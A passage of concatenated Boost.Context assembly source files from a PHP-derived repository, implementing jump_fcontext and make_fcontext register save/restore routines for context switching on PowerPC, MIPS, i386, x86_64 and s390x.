.jump_fcontext:
# endif
#endif
# reserve space on stack
subi %r1, %r1, 184
#if _CALL_ELF != 2
std %r2, 0(%r1) # save TOC
#endif
std %r14, 8(%r1) # save R14
std %r15, 16(%r1) # save R15
std %r16, 24(%r1) # save R16
std %r17, 32(%r1) # save R17
std %r18, 40(%r1) # save R18
std %r19, 48(%r1) # save R19
std %r20, 56(%r1) # save R20
std %r21, 64(%r1) # save R21
std %r22, 72(%r1) # save R22
std %r23, 80(%r1) # save R23
std %r24, 88(%r1) # save R24
std %r25, 96(%r1) # save R25
std %r26, 104(%r1) # save R26
std %r27, 112(%r1) # save R27
std %r28, 120(%r1) # save R28
std %r29, 128(%r1) # save R29
std %r30, 136(%r1) # save R30
std %r31, 144(%r1) # save R31
#if _CALL_ELF != 2
std %r3, 152(%r1) # save hidden
#endif
# save CR
mfcr %r0
std %r0, 160(%r1)
# save LR
mflr %r0
std %r0, 168(%r1)
# save LR as PC
std %r0, 176(%r1)
# store RSP (pointing to context-data) in R6
mr %r6, %r1
#if _CALL_ELF == 2
# restore RSP (pointing to context-data) from R3
mr %r1, %r3
#else
# restore RSP (pointing to context-data) from R4
mr %r1, %r4
ld %r2, 0(%r1) # restore TOC
#endif
ld %r14, 8(%r1) # restore R14
ld %r15, 16(%r1) # restore R15
ld %r16, 24(%r1) # restore R16
ld %r17, 32(%r1) # restore R17
ld %r18, 40(%r1) # restore R18
ld %r19, 48(%r1) # restore R19
ld %r20, 56(%r1) # restore R20
ld %r21, 64(%r1) # restore R21
ld %r22, 72(%r1) # restore R22
ld %r23, 80(%r1) # restore R23
ld %r24, 88(%r1) # restore R24
ld %r25, 96(%r1) # restore R25
ld %r26, 104(%r1) # restore R26
ld %r27, 112(%r1) # restore R27
ld %r28, 120(%r1) # restore R28
ld %r29, 128(%r1) # restore R29
ld %r30, 136(%r1) # restore R30
ld %r31, 144(%r1) # restore R31
#if _CALL_ELF != 2
ld %r3, 152(%r1) # restore hidden
#endif
# restore CR
ld %r0, 160(%r1)
mtcr %r0
# restore LR
ld %r0, 168(%r1)
mtlr %r0
# load PC
ld %r12, 176(%r1)
# restore CTR
mtctr %r12
# adjust stack
addi %r1, %r1, 184
#if _CALL_ELF == 2
# copy transfer_t into transfer_fn arg registers
mr %r3, %r6
# arg pointer already in %r4
# jump to context
bctr
.size jump_fcontext, .-jump_fcontext
#else
# zero in r3 indicates first jump to context-function
cmpdi %r3, 0
beq use_entry_arg
# return transfer_t
std %r6, 0(%r3)
std %r5, 8(%r3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr %r3, %r6
mr %r4, %r5
# jump to context
bctr
# ifdef _CALL_LINUX
.size .jump_fcontext, .-.L.jump_fcontext
# else
.size .jump_fcontext, .-.jump_fcontext
# endif
#endif
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,661
|
Zend/asm/make_mips32_o32_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | F20 | F22 | F24 | F26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | F28 | F30 | S0 | S1 | S2 | S3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | S4 | S5 | S6 | S7 | FP |hiddn| RA | PC | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | ABI ARGS | GP | FCTX| DATA| | *
* ------------------------------------------------- *
* *
* *****************************************************/
.file "make_mips32_o32_elf_gas.S"
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
.ent make_fcontext
make_fcontext:
#ifdef __PIC__
.set noreorder
.cpload $t9
.set reorder
#endif
# shift address in A0 to lower 16 byte boundary
li $v1, -16 # 0xfffffffffffffff0
and $v0, $v1, $a0
# reserve space for context-data on context-stack
# includes an extra 32 bytes for:
# - 16-byte incoming argument area required by mips ABI used when
# jump_context calls the initial function
# - 4 bytes to save our GP register used in finish
# - 8 bytes to as space for transfer_t returned to finish
# - 4 bytes for alignment
addiu $v0, $v0, -128
# third arg of make_fcontext() == address of context-function
sw $a2, 92($v0)
# save global pointer in context-data
sw $gp, 112($v0)
# compute address of returned transfer_t
addiu $t0, $v0, 116
sw $t0, 84($v0)
# compute abs address of label finish
la $t9, finish
# save address of finish as return-address for context-function
# will be entered after context-function returns
sw $t9, 88($v0)
jr $ra # return pointer to context-data
finish:
# reload our gp register (needed for la)
lw $gp, 16($sp)
# call _exit(0)
# the previous function should have left the 16 bytes incoming argument
# area on the stack which we reuse for calling _exit
la $t9, _exit
move $a0, $zero
jr $t9
.end make_fcontext
.size make_fcontext, .-make_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,950
|
Zend/asm/make_ppc64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | R13 | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | FCTX | DATA | | | *
* ------------------------------------------------- *
* *
.text
.globl _make_fcontext
_make_fcontext:
; save return address into R6
mflr r6
; first arg of make_fcontext() == top address of context-function
; shift address in R3 to lower 16 byte boundary
clrrwi r3, r3, 4
; reserve space for context-data on context-stack
; including 64 byte of linkage + parameter area (R1 16 == 0)
subi r3, r3, 240
; third arg of make_fcontext() == address of context-function
stw r5, 176(r3)
; set back-chain to zero
li r0, 0
std r0, 184(r3)
; compute address of returned transfer_t
addi r0, r3, 224
mr r4, r0
std r4, 152(r3)
; load LR
mflr r0
; jump to label 1
bl l1
l1:
; load LR into R4
mflr r4
; compute abs address of label finish
addi r4, r4, lo16((finish - .) + 4)
; restore LR
mtlr r0
; save address of finish as return-address for context-function
; will be entered after context-function returns
std r4, 168(r3)
; restore return address from R6
mtlr r6
blr ; return pointer to context-data
finish:
; save return address into R0
mflr r0
; save return address on stack, set up stack frame
stw r0, 8(r1)
; allocate stack space, R1 16 == 0
stwu r1, -32(r1)
; set return value to zero
li r3, 0
; exit application
bl __exit
nop
|
Aidam7/PHavirP
| 3,613
|
Zend/asm/make_i386_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| EDI | ESI | EBX | EBP | EIP | to | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | | *
* ---------------------------------------------------------------------------------- *
* | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _make_fcontext
.align 2
_make_fcontext:
/* first arg of make_fcontext() == top of context-stack */
movl 0x4(%esp), %eax
/* reserve space for first argument of context-function
eax might already point to a 16byte border */
leal -0x8(%eax), %eax
/* shift address in EAX to lower 16 byte boundary */
andl $-16, %eax
/* reserve space for context-data on context-stack, and align the stack */
leal -0x34(%eax), %eax
/* third arg of make_fcontext() == address of context-function */
/* stored in EBX */
movl 0xc(%esp), %ecx
movl %ecx, 0x10(%eax)
/* save MMX control- and status-word */
stmxcsr (%eax)
/* save x87 control-word */
fnstcw 0x4(%eax)
/* compute abs address of label trampoline */
call 1f
/* address of trampoline 1 */
1: popl %ecx
/* compute abs address of label trampoline */
addl $trampoline-1b, %ecx
/* save address of trampoline as return address */
/* will be entered after calling jump_fcontext() first time */
movl %ecx, 0x18(%eax)
/* compute abs address of label finish */
call 2f
/* address of label 2 */
2: popl %ecx
/* compute abs address of label finish */
addl $finish-2b, %ecx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movl %ecx, 0x14(%eax)
ret /* return pointer to context-data */
trampoline:
/* move transport_t for entering context-function */
movl %eax, (%esp)
movl %edx, 0x4(%esp)
pushl %ebp
/* jump to context-function */
jmp *%ebx
finish:
/* exit code is zero */
xorl %eax, %eax
movl %eax, (%esp)
/* exit application */
call __exit
hlt
|
Aidam7/PHavirP
| 5,840
|
Zend/asm/jump_x86_64_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | R12 | R13 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R14 | R15 | RBX | RBP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ---------------------------------------------------------------------------------- *
* | 0x40 | 0x44 | | *
* ---------------------------------------------------------------------------------- *
* | RIP | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
# if defined __CET__
# include <cet.h>
# define SHSTK_ENABLED (__CET__ & 0x2)
# define BOOST_CONTEXT_SHADOW_STACK (SHSTK_ENABLED && SHADOW_STACK_SYSCALL)
# else
# define _CET_ENDBR
# endif
.file "jump_x86_64_sysv_elf_gas.S"
.text
.globl jump_fcontext
.type jump_fcontext,@function
.align 16
jump_fcontext:
_CET_ENDBR
leaq -0x40(%rsp), %rsp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%rsp) /* save MMX control- and status-word */
fnstcw 0x4(%rsp) /* save x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movq %fs:0x28, %rcx /* read stack guard from TLS record */
movq %rcx, 0x8(%rsp) /* save stack guard */
#endif
movq %r12, 0x10(%rsp) /* save R12 */
movq %r13, 0x18(%rsp) /* save R13 */
movq %r14, 0x20(%rsp) /* save R14 */
movq %r15, 0x28(%rsp) /* save R15 */
movq %rbx, 0x30(%rsp) /* save RBX */
movq %rbp, 0x38(%rsp) /* save RBP */
#if BOOST_CONTEXT_SHADOW_STACK
/* grow the stack to reserve space for shadow stack pointer(SSP) */
leaq -0x8(%rsp), %rsp
/* read the current SSP and store it */
rdsspq %rcx
movq %rcx, (%rsp)
#endif
#if BOOST_CONTEXT_SHADOW_STACK
/* grow the stack to reserve space for shadow stack pointer(SSP) */
leaq -0x8(%rsp), %rsp
/* read the current SSP and store it */
rdsspq %rcx
movq %rcx, (%rsp)
# endif
/* store RSP (pointing to context-data) in RAX */
movq %rsp, %rax
/* restore RSP (pointing to context-data) from RDI */
movq %rdi, %rsp
#if BOOST_CONTEXT_SHADOW_STACK
/* first 8 bytes are SSP */
movq (%rsp), %rcx
leaq 0x8(%rsp), %rsp
/* Restore target(new) shadow stack */
rstorssp -8(%rcx)
/* restore token for previous shadow stack is pushed */
/* on previous shadow stack after saveprevssp */
saveprevssp
/* when return, jump_fcontext jump to restored return address */
/* (r8) instead of RET. This miss of RET implies us to unwind */
/* shadow stack accordingly. Otherwise mismatch occur */
movq $1, %rcx
incsspq %rcx
#endif
movq 0x40(%rsp), %r8 /* restore return-address */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%rsp) /* restore MMX control- and status-word */
fldcw 0x4(%rsp) /* restore x87 control-word */
#endif
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
movq 0x8(%rsp), %rdx /* load stack guard */
movq %rdx, %fs:0x28 /* restore stack guard to TLS record */
#endif
movq 0x10(%rsp), %r12 /* restore R12 */
movq 0x18(%rsp), %r13 /* restore R13 */
movq 0x20(%rsp), %r14 /* restore R14 */
movq 0x28(%rsp), %r15 /* restore R15 */
movq 0x30(%rsp), %rbx /* restore RBX */
movq 0x38(%rsp), %rbp /* restore RBP */
leaq 0x48(%rsp), %rsp /* prepare stack */
/* return transfer_t from jump */
#if !defined(_ILP32)
/* RAX == fctx, RDX == data */
movq %rsi, %rdx
#else
/* RAX == data:fctx */
salq $32, %rsi
orq %rsi, %rax
#endif
/* pass transfer_t as first arg in context function */
#if !defined(_ILP32)
/* RDI == fctx, RSI == data */
#else
/* RDI == data:fctx */
#endif
movq %rax, %rdi
/* indirect jump to context */
jmp *%r8
.size jump_fcontext,.-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,827
|
Zend/asm/make_ppc32_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F30 | F31 | fpscr | R13 | R14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | R15 | R16 | R17 | R18 | R19 | R20 | R21 | R22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | R23 | R24 | R25 | R26 | R27 | R28 | R29 | R30 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | R31 |hiddn| CR | LR | PC |bchai|linkr| FCTX| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | | *
* ------------------------------------------------- *
* | 256 | | *
* ------------------------------------------------- *
* | DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _make_fcontext
.align 2
_make_fcontext:
; save return address into R6
mflr r6
; first arg of make_fcontext() == top address of context-function
; shift address in R3 to lower 16 byte boundary
clrrwi r3, r3, 4
; reserve space for context-data on context-stack
; including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi r3, r3, 336
; third arg of make_fcontext() == address of context-function
; store as trampoline's R31
stw r5, 224(r3)
; set back-chain to zero
li r0, 0
stw r0, 244(r3)
mffs f0 ; load FPSCR
stfd f0, 144(r3) ; save FPSCR
; compute address of returned transfer_t
addi r0, r3, 252
mr r4, r0
stw r4, 228(r3)
; load LR
mflr r0
; jump to label 1
bcl 20, 31, L1
L1:
; load LR into R4
mflr r4
; compute abs address of trampoline, use as PC
addi r5, r4, lo16(Ltrampoline - L1)
stw r5, 240(r3)
; compute abs address of label finish
addi r4, r4, lo16(Lfinish - L1)
; restore LR
mtlr r0
; save address of finish as return-address for context-function
; will be entered after context-function returns
stw r4, 236(r3)
; restore return address from R6
mtlr r6
blr ; return pointer to context-data
Ltrampoline:
; We get R31 = context-function, R3 = address of transfer_t,
; but we need to pass R3:R4 = transfer_t.
mtctr r31
lwz r4, 4(r3)
lwz r3, 0(r3)
bctr
Lfinish:
; load address of _exit into CTR
bcl 20, 31, L2
L2:
mflr r4
addis r4, r4, ha16(Lexitp - L2)
lwz r4, lo16(Lexitp - L2)(r4)
mtctr r4
; exit code is zero
li r3, 0
; exit application
bctr
.const_data
.align 2
Lexitp:
.long __exit
|
Aidam7/PHavirP
| 4,087
|
Zend/asm/make_s390x_sysv_elf_gas.S
|
/*******************************************************
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | t.fctx | t.data | r2 | r6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | r7 | r8 | r9 | r10 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | r11 | r12 | r13 | r14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 104 | 112 | 120 | *
* ------------------------------------------------- *
* | f8 | f9 | f10 | f11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 136 | 144 | 152 | *
* ------------------------------------------------- *
* | f12 | f13 | f14 | f15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 168 | 176 | | *
* ------------------------------------------------- *
* | fpc | pc | | | *
* ------------------------------------------------- *
*******************************************************/
.text
.align 8
.global make_fcontext
.type make_fcontext, @function
#define ARG_OFFSET 0
#define GR_OFFSET 16
#define R14_OFFSET 88
#define FP_OFFSET 96
#define FPC_OFFSET 160
#define PC_OFFSET 168
#define CONTEXT_SIZE 176
/*
fcontext_t make_fcontext( void * sp, std::size_t size, void (* fn)( transfer_t) );
Create and return a context below SP to call FN.
Incoming args
r2 - The stack location where to create the context
r3 - The size of the context
r4 - The address of the context function
*/
make_fcontext:
.machine "z10"
/* Align the stack to an 8 byte boundary. */
nill %r2,0xfff0
/* Allocate stack space for the context. */
aghi %r2,-CONTEXT_SIZE
/* Set the r2 save slot to zero. This indicates jump_fcontext
that this is a special context. */
mvghi GR_OFFSET(%r2),0
/* Save the floating point control register. */
stfpc FPC_OFFSET(%r2)
/* Store the address of the target function as new pc. */
stg %r4,PC_OFFSET(%r2)
/* Store a pointer to the finish routine as r14. If a function
called via context routines just returns that value will be
loaded and used as return address. Hence the program will
just exit. */
larl %r1,finish
stg %r1,R14_OFFSET(%r2)
/* Return as usual with the new context returned in r2. */
br %r14
finish:
/* In finish tasks, you load the exit code and exit the
make_fcontext This is called when the context-function is
entirely executed. */
lghi %r2,0
brasl %r14,_exit@PLT
.size make_fcontext,.-make_fcontext
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,306
|
Zend/asm/jump_x86_64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| R12 | R13 | R14 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R15 | RBX | RBP | RIP | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _jump_fcontext
.align 8
_jump_fcontext:
leaq -0x38(%rsp), %rsp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%rsp) /* save MMX control- and status-word */
fnstcw 0x4(%rsp) /* save x87 control-word */
#endif
movq %r12, 0x8(%rsp) /* save R12 */
movq %r13, 0x10(%rsp) /* save R13 */
movq %r14, 0x18(%rsp) /* save R14 */
movq %r15, 0x20(%rsp) /* save R15 */
movq %rbx, 0x28(%rsp) /* save RBX */
movq %rbp, 0x30(%rsp) /* save RBP */
/* store RSP (pointing to context-data) in RAX */
movq %rsp, %rax
/* restore RSP (pointing to context-data) from RDI */
movq %rdi, %rsp
movq 0x38(%rsp), %r8 /* restore return-address */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%rsp) /* restore MMX control- and status-word */
fldcw 0x4(%rsp) /* restore x87 control-word */
#endif
movq 0x8(%rsp), %r12 /* restore R12 */
movq 0x10(%rsp), %r13 /* restore R13 */
movq 0x18(%rsp), %r14 /* restore R14 */
movq 0x20(%rsp), %r15 /* restore R15 */
movq 0x28(%rsp), %rbx /* restore RBX */
movq 0x30(%rsp), %rbp /* restore RBP */
leaq 0x40(%rsp), %rsp /* prepare stack */
/* return transfer_t from jump */
/* RAX == fctx, RDX == data */
movq %rsi, %rdx
/* pass transfer_t as first arg in context function */
/* RDI == fctx, RSI == data */
movq %rax, %rdi
/* indirect jump to context */
jmp *%r8
|
Aidam7/PHavirP
| 6,059
|
Zend/asm/jump_ppc32_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai| CR | LR |compl| link| TOC | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | F30 | F31 | PC |hiddn| fpscr | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 256 | 260 | 264 | 268 | 272 | 276 | 280 | 284 | *
* ------------------------------------------------- *
* |bchai|savCR|savLR|compl| link|svTOC| FCTX| DATA| *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc32_sysv_xcoff_gas.S"
.toc
.csect .text[PR], 5
.globl jump_fcontext[DS]
.globl .jump_fcontext
.csect jump_fcontext[DS]
jump_fcontext:
.long .jump_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.jump_fcontext:
# reserve space on stack
subi 1, 1, 256
# save CR
mfcr 0
stw 0, 4(1)
# save LR
mflr 0
stw 0, 8(1)
# save LR as PC
stw 0, 240(1)
# save TOC
stw 2, 20(1)
# Save registers R14 to R31.
stw 14, 24(1)
stw 15, 28(1)
stw 16, 32(1)
stw 17, 36(1)
stw 18, 40(1)
stw 19, 44(1)
stw 20, 48(1)
stw 21, 52(1)
stw 22, 56(1)
stw 23, 60(1)
stw 24, 64(1)
stw 25, 68(1)
stw 26, 72(1)
stw 27, 76(1)
stw 28, 80(1)
stw 29, 84(1)
stw 30, 88(1)
stw 31, 92(1)
# Save registers F14 to F31 in slots with 8-byte alignment.
# 4-byte alignment may stall the pipeline of some processors.
# Less than 4 may cause alignment traps.
stfd 14, 96(1)
stfd 15, 104(1)
stfd 16, 112(1)
stfd 17, 120(1)
stfd 18, 128(1)
stfd 19, 136(1)
stfd 20, 144(1)
stfd 21, 152(1)
stfd 22, 160(1)
stfd 23, 168(1)
stfd 24, 176(1)
stfd 25, 184(1)
stfd 26, 192(1)
stfd 27, 200(1)
stfd 28, 208(1)
stfd 29, 216(1)
stfd 30, 224(1)
stfd 31, 232(1)
# hidden pointer
stw 3, 244(1)
mffs 0 # load FPSCR
